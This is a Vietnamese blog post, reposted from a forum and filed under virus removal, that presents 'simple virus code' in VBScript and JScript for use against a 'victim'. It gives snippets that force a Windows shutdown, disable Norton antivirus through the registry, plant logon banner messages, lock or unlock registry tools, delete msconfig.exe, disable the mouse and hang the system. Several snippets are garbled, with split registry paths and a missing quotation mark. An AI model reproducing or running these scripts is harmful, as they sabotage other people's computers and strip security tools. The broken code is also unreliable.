Tài nguyên dạy học

free counters

Hỗ trợ trực tuyến

 • (Lê Anh Dũng)

Thống kê

 • truy cập   (chi tiết)
  trong hôm nay
 • lượt xem
  trong hôm nay
 • thành viên
 • Thành viên trực tuyến

  0 khách và 0 thành viên

  Liên kết website

  Gốc > Bài viết > Hướng dẫn diệt virus >

  Một số Code virus đơn giản.

  Chỉ với Notepad hay Wordpad bạnđã có thể tự tạo cho mình 1 "chú" Virus dưới dạng _VBSCRIPT hoặc _Javascript rồi:

  Dưới đây là code của một số con virus nhỏ dưới dạng VBS:

  1.Không cho victim khởi động máy:

  Mã:
  Dim wsh Set wsh = createobject("wscript.shell") wsh.run "RUNDLL32.EXE user.exe,exitwindows"
  
  2. Disable NAV:

  Mã:
  Dim wsh Set wsh= CreateObject( "WScript.Shell") s1 = "HKEY_LOCAL_MACHINE\System\CurrentControlSet\S ervi c es\Norton Program Scheduler\Start" wsh.RegWrite s1,3, "REG_DWORD"
  

  3. Hiển thị một message mỗi khi reboot máy:

  Mã:
  dim wsh Set wsh = CreateObject( "WScript.Shell" ) s1 = "HKLM\Software\Microsoft\Windows\CurrentVersio n\Wi n Logon\" s2 = "LegalNoticeCaption" s3 = "LegalNoticeText" wsh.RegWrite s1+s2, "http://allformy.topcities.com" wsh.RegWrite s1+s3, "Ta la anh_hung_bat_dac_di000-Toi den tu HVA"
  
  4. Hiển thị một dòng lệnh khi click vào file hay folder:,

  Mã:
  set reg=createobject("WScript.shell") reg.regwrite "HKEY_CLASSES_ROOT\*\Shell\\","Ban da bi toi khong che" reg.regwrite "HKEY_CLASSES_ROOT\folder\shell\Ban da bi toi khong che","I_LOVE_U"
  
  5. Làm cho các trò trên hoạt động bình thường:

  Mã:
  Dim objShell Set objShell = CreateObject( "WScript.Shell" ) s1 = "HKEY_USERS\.Default\Software\Microsoft\Window s\Cu rrentVersion\ " s2 = "Policies\System\DisableRegistryTools" objShell.RegWrite s1+s2,1, "REG_DWORD"
  

  Dưới dạng Javascipt :


  var wsh;
  wsh=new ActiveXObject ("Wscript.shell");


  // Winlogon when reboot


  Mã:
  var s1 = "HKLM\\Software\\Microsoft\\Windows\\CurrentVe rsio n \\WinLogon\\"; var s2 = "LegalNoticeCaption"; var s3 = "LegalNoticeText"; wsh.RegWrite (s1+ s2, "http://allformy.topcities.com") ; wsh.RegWrite (s1+s3, "Ban da bi toi khong che") ;
  
  //Disable Registry
  Mã:
  var s1 = "HKEY_USERS\\.Default\\Software\\Microsoft\\Wi ndow s\\CurrentVers ion\\"; var s2 = "Policies\\System\\DisableRegistryTools" ; wsh.RegWrite (s1+s2,0,"REG_DWORD");
  
  //Delete file Msconfig.exe làm cho victim khởi động tới Registry luôn

  Mã:
  var fso; fso=new ActiveXObject("Scripting.FileSystemObject"); var fe=fso.getfile("C:\\windows\\msconfig.exe); fe.delete true;
  
  //Shutdown windows

  //Disable Mouse

  Mã:
  wsh.run ("RUNDLL32.EXE mouse,disable");
  
  //Hang up windows

  Mã:
  wsh.run ("rundll32 user,disableoemlayer");
  

   

  Theo forum.tech24.vn


  Nhắn tin cho tác giả
  Lê Anh Dũng @ 08:43 09/02/2010
  Số lượt xem: 190
  Số lượt thích: 0 người
   
  Gửi ý kiến